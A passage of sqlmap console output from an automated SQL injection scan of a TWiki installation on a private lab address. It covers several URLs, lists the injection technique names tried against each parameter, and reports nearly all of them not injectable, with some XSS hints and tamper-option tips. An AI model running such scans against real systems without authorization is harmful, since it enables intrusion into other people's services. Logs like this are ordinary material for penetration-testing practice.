[18:25:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:25:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:25:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:25:07] [INFO] testing 'Oracle AND time-based blind'
[18:25:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:25:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:25:24] [WARNING] GET parameter 'rev2' is not injectable
[18:25:24] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 21:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiSite?rev=1.21
do you want to test this URL? [Y/n/q]
> Y
[18:25:24] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiSite?rev=1.21'
[18:25:24] [INFO] testing connection to the target URL
[18:25:24] [INFO] testing if the target URL is stable
[18:25:25] [INFO] target URL is stable
[18:25:25] [INFO] testing if GET parameter 'rev' is dynamic
[18:25:25] [INFO] confirming that GET parameter 'rev' is dynamic
[18:25:25] [INFO] GET parameter 'rev' is dynamic
[18:25:25] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[18:25:25] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[18:25:25] [INFO] testing for SQL injection on GET parameter 'rev'
[18:25:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:25:25] [WARNING] reflective value(s) found and filtering out
[18:25:27] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:25:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:25:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:25:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:25:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:25:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:25:30] [INFO] testing 'MySQL inline queries'
[18:25:30] [INFO] testing 'PostgreSQL inline queries'
[18:25:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:25:30] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:25:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:25:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:25:32] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:25:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:25:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:25:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:25:34] [INFO] testing 'Oracle AND time-based blind'
[18:25:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:25:35] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:25:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:25:50] [WARNING] GET parameter 'rev' is not injectable
[18:25:50] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:25:50] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiSite?rev1=1.21&rev2=1.20'
[18:25:50] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiSite?rev=1.20'
URL 22:
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiSite?template=oopsmore&param1=1.22&param2=1.22
do you want to test this URL? [Y/n/q]
> Y
[18:25:50] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiSite?template=oopsmore&param1=1.22&param2=1.22'
[18:25:50] [INFO] testing connection to the target URL
[18:25:50] [INFO] testing if the target URL is stable
[18:25:51] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[18:25:51] [INFO] testing if GET parameter 'template' is dynamic
[18:25:51] [INFO] confirming that GET parameter 'template' is dynamic
[18:25:51] [INFO] GET parameter 'template' is dynamic
[18:25:51] [INFO] heuristics detected web page charset 'ascii'
[18:25:51] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[18:25:52] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[18:25:52] [INFO] testing for SQL injection on GET parameter 'template'
[18:25:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:25:52] [WARNING] reflective value(s) found and filtering out
[18:25:53] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:25:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:25:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:25:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:25:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:25:55] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:25:55] [INFO] testing 'MySQL inline queries'
[18:25:55] [INFO] testing 'PostgreSQL inline queries'
[18:25:55] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:25:55] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:25:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:25:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:25:56] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:25:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:25:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:25:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:25:58] [INFO] testing 'Oracle AND time-based blind'
[18:25:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:25:59] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:26:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:26:10] [WARNING] GET parameter 'template' is not injectable
[18:26:10] [INFO] testing if GET parameter 'param1' is dynamic
[18:26:10] [WARNING] GET parameter 'param1' does not appear dynamic
[18:26:10] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[18:26:10] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[18:26:10] [INFO] testing for SQL injection on GET parameter 'param1'
[18:26:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:26:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:26:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:26:13] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:26:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:26:15] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:26:15] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:26:15] [INFO] testing 'MySQL inline queries'
[18:26:16] [INFO] testing 'PostgreSQL inline queries'
[18:26:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:26:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:26:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:26:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:26:18] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:26:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:26:19] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:26:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:26:20] [INFO] testing 'Oracle AND time-based blind'
[18:26:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:26:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:26:39] [WARNING] GET parameter 'param1' is not injectable
[18:26:39] [INFO] testing if GET parameter 'param2' is dynamic
[18:26:40] [WARNING] GET parameter 'param2' does not appear dynamic
[18:26:40] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[18:26:40] [INFO] testing for SQL injection on GET parameter 'param2'
[18:26:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:26:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:26:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:26:43] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:26:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:26:45] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:26:45] [INFO] testing 'MySQL inline queries'
[18:26:45] [INFO] testing 'PostgreSQL inline queries'
[18:26:45] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:26:45] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:26:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:26:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:26:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:26:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:26:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:26:49] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:26:50] [INFO] testing 'Oracle AND time-based blind'
[18:26:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:27:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:27:09] [WARNING] GET parameter 'param2' is not injectable
[18:27:09] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 23:
GET http://192.168.1.113:80/twiki/bin/rename/TWiki/TWikiSite?newweb=TWiki&newtopic=TWikiWeb&confirm=on
do you want to test this URL? [Y/n/q]
> Y
[18:27:09] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rename/TWiki/TWikiSite?newweb=TWiki&newtopic=TWikiWeb&confirm=on'
[18:27:09] [INFO] testing connection to the target URL
[18:27:10] [INFO] testing if the target URL is stable
[18:27:10] [INFO] target URL is stable
[18:27:10] [INFO] testing if GET parameter 'newweb' is dynamic
sqlmap got a 302 redirect to 'http://192.168.1.113/twiki/bin/oops/5911/TWikiWeb'. Do you want to follow? [Y/n] Y
[18:27:10] [INFO] confirming that GET parameter 'newweb' is dynamic
[18:27:11] [INFO] GET parameter 'newweb' is dynamic
[18:27:11] [WARNING] heuristic (basic) test shows that GET parameter 'newweb' might not be injectable
[18:27:11] [INFO] testing for SQL injection on GET parameter 'newweb'
[18:27:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:27:11] [INFO] heuristics detected web page charset 'ascii'
[18:27:11] [WARNING] reflective value(s) found and filtering out
[18:27:13] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:27:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:27:14] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:27:15] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:27:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:27:17] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:27:17] [INFO] testing 'MySQL inline queries'
[18:27:17] [INFO] testing 'PostgreSQL inline queries'
[18:27:18] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:27:18] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:27:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:27:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:27:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:27:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:27:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:27:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:27:23] [INFO] testing 'Oracle AND time-based blind'
[18:27:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:27:24] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:27:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:27:45] [WARNING] GET parameter 'newweb' is not injectable
[18:27:45] [WARNING] GET parameter 'newtopic' does not appear dynamic
[18:27:45] [WARNING] heuristic (basic) test shows that GET parameter 'newtopic' might not be injectable
[18:27:45] [INFO] testing for SQL injection on GET parameter 'newtopic'
[18:27:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:27:49] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:27:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:27:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:27:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:27:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:27:54] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:27:55] [INFO] testing 'MySQL inline queries'
[18:27:55] [INFO] testing 'PostgreSQL inline queries'
[18:27:55] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:27:55] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:27:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:27:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:27:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:27:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:28:00] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:28:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:28:02] [INFO] testing 'Oracle AND time-based blind'
[18:28:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:28:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:28:34] [WARNING] GET parameter 'newtopic' is not injectable
[18:28:34] [WARNING] GET parameter 'confirm' does not appear dynamic
[18:28:35] [WARNING] heuristic (basic) test shows that GET parameter 'confirm' might not be injectable
[18:28:35] [INFO] testing for SQL injection on GET parameter 'confirm'
[18:28:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:28:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:28:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:28:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:28:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:28:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:28:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:28:43] [INFO] testing 'MySQL inline queries'
[18:28:43] [INFO] testing 'PostgreSQL inline queries'
[18:28:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:28:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:28:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:28:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:28:46] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:28:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:28:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:28:49] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:28:50] [INFO] testing 'Oracle AND time-based blind'
[18:28:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:29:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:29:21] [WARNING] GET parameter 'confirm' is not injectable
[18:29:21] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 24:
GET http://192.168.1.113:80/twiki/bin/edit/Main/WebTopicList?t=1441456603
do you want to test this URL? [Y/n/q]
> Y
[18:29:21] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/WebTopicList?t=1441456603'
[18:29:21] [INFO] testing connection to the target URL
[18:29:22] [INFO] testing if the target URL is stable
[18:29:22] [INFO] target URL is stable
[18:29:22] [INFO] testing if GET parameter 't' is dynamic
[18:29:23] [WARNING] GET parameter 't' does not appear dynamic
[18:29:23] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[18:29:23] [INFO] testing for SQL injection on GET parameter 't'
[18:29:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:29:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:29:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:29:25] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:29:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:29:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:29:27] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:29:27] [INFO] testing 'MySQL inline queries'
[18:29:27] [INFO] testing 'PostgreSQL inline queries'
[18:29:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:29:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:29:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:29:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:29:29] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:29:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:29:30] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:29:30] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:29:31] [INFO] testing 'Oracle AND time-based blind'
[18:29:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:29:31] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:29:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:29:46] [WARNING] GET parameter 't' is not injectable
[18:29:46] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 25:
GET http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text&regex=on&search=Web *Topic *List[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[18:29:46] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text&regex=on&search=Web *Topic *List[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[18:29:46] [INFO] testing connection to the target URL
[18:29:46] [INFO] testing if the target URL is stable
[18:29:47] [INFO] target URL is stable
[18:29:47] [INFO] testing if URI parameter '#1*' is dynamic
[18:29:47] [WARNING] URI parameter '#1*' does not appear dynamic
[18:29:47] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[18:29:47] [INFO] testing for SQL injection on URI parameter '#1*'
[18:29:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:29:47] [WARNING] reflective value(s) found and filtering out
[18:29:49] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:29:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:29:49] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:29:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:29:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:29:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:29:52] [INFO] testing 'MySQL inline queries'
[18:29:52] [INFO] testing 'PostgreSQL inline queries'
[18:29:52] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:29:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:29:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:29:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:29:53] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:29:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:29:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:29:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:29:56] [INFO] testing 'Oracle AND time-based blind'
[18:29:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:29:57] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:30:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:30:11] [WARNING] URI parameter '#1*' is not injectable
[18:30:11] [INFO] testing if URI parameter '#2*' is dynamic
[18:30:11] [WARNING] URI parameter '#2*' does not appear dynamic
[18:30:11] [WARNING] heuristic (basic) test shows that URI parameter '#2*' might not be injectable
[18:30:11] [INFO] testing for SQL injection on URI parameter '#2*'
[18:30:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:30:13] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:30:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:30:14] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:30:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:30:15] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:30:15] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:30:16] [INFO] testing 'MySQL inline queries'
[18:30:16] [INFO] testing 'PostgreSQL inline queries'
[18:30:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:30:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:30:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:30:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:30:17] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:30:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:30:19] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:30:19] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:30:20] [INFO] testing 'Oracle AND time-based blind'
[18:30:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:30:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:30:35] [INFO] target URL appears to be UNION injectable with 1 columns
[18:30:35] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[18:30:35] [WARNING] URI parameter '#2*' is not injectable
[18:30:35] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 26:
GET http://192.168.1.113:80/twiki/bin/view/Main/WebTopicList?skin=print
do you want to test this URL? [Y/n/q]
> Y
[18:30:35] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebTopicList?skin=print'
[18:30:35] [INFO] testing connection to the target URL
[18:30:36] [INFO] testing if the target URL is stable
[18:30:36] [INFO] target URL is stable
[18:30:36] [INFO] testing if GET parameter 'skin' is dynamic
[18:30:36] [INFO] confirming that GET parameter 'skin' is dynamic
[18:30:37] [INFO] GET parameter 'skin' is dynamic
[18:30:37] [INFO] heuristics detected web page charset 'ascii'
[18:30:37] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[18:30:37] [INFO] testing for SQL injection on GET parameter 'skin'
[18:30:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:30:37] [WARNING] reflective value(s) found and filtering out
[18:30:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:30:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:30:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:30:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:30:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:30:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:30:41] [INFO] testing 'MySQL inline queries'
[18:30:41] [INFO] testing 'PostgreSQL inline queries'
[18:30:41] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:30:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:30:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:30:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:30:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:30:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:30:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:30:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:30:45] [INFO] testing 'Oracle AND time-based blind'
[18:30:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:30:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:30:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:30:59] [WARNING] GET parameter 'skin' is not injectable
[18:30:59] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 27:
GET http://192.168.1.113:80/twiki/bin/rdiff/Main/WebTopicList?rev1=1.2&rev2=1.1
do you want to test this URL? [Y/n/q]
> Y
[18:30:59] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebTopicList?rev1=1.2&rev2=1.1'
[18:30:59] [INFO] testing connection to the target URL
[18:30:59] [INFO] testing if the target URL is stable
[18:31:00] [INFO] target URL is stable
[18:31:00] [INFO] testing if GET parameter 'rev1' is dynamic
[18:31:00] [WARNING] GET parameter 'rev1' does not appear dynamic
